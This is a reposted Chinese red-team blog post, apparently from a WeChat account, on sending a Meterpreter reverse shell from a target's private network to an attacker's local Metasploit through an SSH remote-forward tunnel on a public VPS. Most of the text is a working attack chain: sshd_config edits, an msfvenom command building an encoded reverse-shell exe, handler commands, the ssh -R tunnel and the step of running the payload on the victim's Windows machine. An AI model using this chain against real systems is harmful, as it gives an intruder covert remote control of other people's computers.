利用ssh隧道将公网meterpreter弹至本地的msf中

admin 2024年11月9日16:03:59评论7 views字数 2402阅读8分0秒阅读模式

不少人私信说如果攻击者的网络和被攻击者的网络都是位于不同地理位置的私网,这种情况下如何反弹shell,今天统一给大家介绍一款最间简单的方式。

利用自己公网VPS的SSH把meterpreter直接弹到本地的msf中

一、环境介绍

ubuntu16-LAMP:假设为入侵者公网的一台linux[vps]机器,公网ip(192.168.3.110 )
Stack:假设为入侵者本地内网的一台linux机器,本地内网ip(192.168.122.154)
win10-client:假设为目标内网下的一台windows客户机,内网ip: 192.168.5.5

二、环境拓扑
根据上面的环境,画出实战中的网络拓扑图

利用ssh隧道将公网meterpreter弹至本地的msf中

三、实验操作

1、首先,我们需要先到自己的ubuntu16-LAMP [vps]机器上开启ssh的端口转发功能,编写ssh配置文件:vim /etc/ssh/sshd_config,内容如下

修改 #AllowTcpForwarding yes #GatewayPorts no #TCPKeepAlive yes #PasswordAuthentication yes为: AllowTcpForwarding yes GatewayPorts yes TCPKeepAlive yes PasswordAuthentication yes

配置完后重启ssh服务

systemctl restart ssh.service

2、在本地的Stack机器上,准备好我们的reverse型payload

msfvenom --platform windows -p windows/meterpreter/reverse_tcp_rc4_dns lhost=192.168.3.110 lport=443 rc4oasswird=klion -e x86/shikata_ga_nai -b 'x00' -i 5 -f exe -o dajun_rc4.exe

payload制作成功后,会提示payload的属性信息,如下所示:

[-] No arch selected, selecting arch: x86 from the payloadFound 1 compatible encodersAttempting to encode payload with 5 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 521 (iteration=0)x86/shikata_ga_nai succeeded with size 548 (iteration=1)x86/shikata_ga_nai succeeded with size 575 (iteration=2)x86/shikata_ga_nai succeeded with size 602 (iteration=3)x86/shikata_ga_nai succeeded with size 629 (iteration=4)x86/shikata_ga_nai chosen with final size 629Payload size: 629 bytesFinal size of exe file: 73802 bytesSaved as: dajun_rc4.exe

3、payload准备好之后,顺手继续在本地的Stack机器上做好对应的监听

msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp_rc4_dns msf > set lport 53 msf > set lhost 192.168.122.154 msf > set rc4password klion msf > set exitonsession false msf > exploit-j

4、至此为止,所有的准备工作就完成的差不多了,紧接着,开始整个过程中最关键的一步,在本地的Stack机 器上建立ssh隧道执行远程转发

ssh-C-f-N-g-R 0.0.0.0:443:192.168.122.154:53 root@192.168.3.110-p 22

5、查看端口监听状态

netstat-tulnp | grep ":443"习惯性的去看下vps上的443端到底口有没有起来

6、最后,把payload丢到目标内网下的Win10-client机器上去执行,即可看到我们的meterpreter在本地成功上线

利用ssh隧道将公网meterpreter弹至本地的msf中

7、搞定只有,我们来简单回顾一下整个流程

    说到这里,可能有些兄弟可能还是会有点儿懵,其实非常简单,一句话概括就是,先在本地机器上和vps建 立好ssh隧道,并在此隧道中执行一条远程转发[如果此处还没搞清远程转发的原理细节,可以先去参考前面 的文章],而被转发的这个端口正好是meterpreter的端口,这样一来,当meterpreter的端口再被弹到vps 上时其实就相当于直接被转到了自己的本地机器上,这样说参不多都应该能明白了。

8、技术小节

    在之前的文章我们详细的说明了如果利用ssh隧道的本地端口转发来弹来自公网的meterpreter,此处, 我们又再次说明如果利用ssh隧道的远程端口转发来弹来自公网的meterpreter,大家可根据自己的实际渗 透场景灵活应用,在此之前,你可能还会去用一些lcx之类的工具在vps上做中转,此刻,你完全可以丢到那些 垃圾了,虽然说,meterpreter不是全程被封装在ssh隧道中[其实它只封装了一半],但ssh隧道+payload 自身双重加密还是能在一定程度上保全你自己的,而且,这样建立起的meterpreter也更加稳定,我们貌似一 直在拿meterpreter 举例,其实beacon也是一样的道理,ssh隧道能衍生的技巧还是非常多的,大家可先自 行尝试,待续...

原文始发于微信公众号(Red Teams):利用ssh隧道将公网meterpreter弹至本地的msf中

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日16:03:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用ssh隧道将公网meterpreter弹至本地的msf中https://cn-sec.com/archives/3376875.html

发表评论

匿名网友 填写信息